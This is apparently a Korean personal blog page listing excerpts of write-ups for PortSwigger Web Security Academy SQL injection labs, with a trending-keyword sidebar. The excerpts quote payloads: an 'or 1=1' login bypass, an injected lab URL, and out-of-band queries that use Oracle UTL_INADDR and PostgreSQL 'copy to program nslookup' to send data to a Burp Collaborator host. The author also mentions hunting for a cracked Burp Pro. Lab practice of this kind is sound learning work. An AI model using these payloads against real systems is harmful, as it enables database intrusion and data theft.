일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
- 양적완화
- 성남은혜의강교회
- 성남 코로나 확진자
- 픽크루
- 이지혜
- 학교 개학 연기 4월
- 뭉쳐야 찬다
- 이상형 만들기
- 폰폰테스트
- 제넥신
- 유튜버 김재석
- 은혜의 강 교회
- 리리남매
- 미국 금리인하
- 최강욱
- 킹덤 고근희
- 스콜피온킹
- 임영규
- libtins
- 고민정
- 김재석
- 김영권 아내
- 불가피
- 홍혜걸
- 조희연
- 김영권
- 이태원 클라쓰 15회 예고
- 해킹
- 금리인하
- 스페인 코로나
- Today
- Total
목록portswigger-academy (17)
Dork's port
로그인 바이패스 하는 문제로 로그인 아이디 창에 or 1=1 -- 하면 된다. 내가 문제 난이도를.. TopDown 형식으로 풀었나..?
음.. 이거 LOS 할때 했던건데.. 제일 처음 문제인데 왜 마지막에 있는 지는 모르겠지만, 카테고리 필터에 SQL injection을 해서 모든 결과를 얻어내면 되는 문제. [https://ac7a1f091f04c4ec807b233300ac0040.web-security-academy.net/filter?category=Accessories%27%20or%201=1--](https://ac7a1f091f04c4ec807b233300ac0040.web-security-academy.net/filter?category=Accessories' or 1=1--)
이 문제는 burp의 public server를 이용해서 풀어야하는 문제인데...burp suite의 community 버전에서는 사용이 안되고 pro 버전 이상에서 부터만 사용이 된다. 크랙 찾느라 한 2시간 삽질하다 그냥 free trial 사용하기로 결정.. 나중에 이런 형태의 injection을 하게 된다면 DNS server를 구축해서 써야겠다. 비밀번호를 얻어야하는데..이거 너무 불편한데...? 이걸로 자동화하기엔.. ' UNION SELECT CASE WHEN LENGTH(password) > 1 THEN UTL_INADDR.get_host_address('ki6wa1k0dp7sfjv4wbjv8rhc73d11q.burpcollaborator.net') ELSE NULL ..
out-of-band 를 발생시키면 되는 문제. 즉, 다른곳으로 패킷이 날라가게끔 하면된다. cheat-sheet에 따르면, Oracle은 이미 패치가 되었고 (그러나 아직 이전 버전의 사용자가 많다고 서술하고 있다), MySQL에서는 windows에서만 가능하다고 한다. 우선 이전에 쭉 PostgreSQL을 사용하였으므로 먼저 테스트해보려고 copy (SELECT '') to program 'nslookup burpcollaborator.net' 을 테스트 해보았다. 내가 구축한 DB에서는 정상적으로 동작하지 않았는데 그 이유는 DB를 구동하는 Docker에 nslookup이 없기때문인 것 같다. 그래서 이제 SQL Injection에 동작하는 query를 만들어야하는데 병..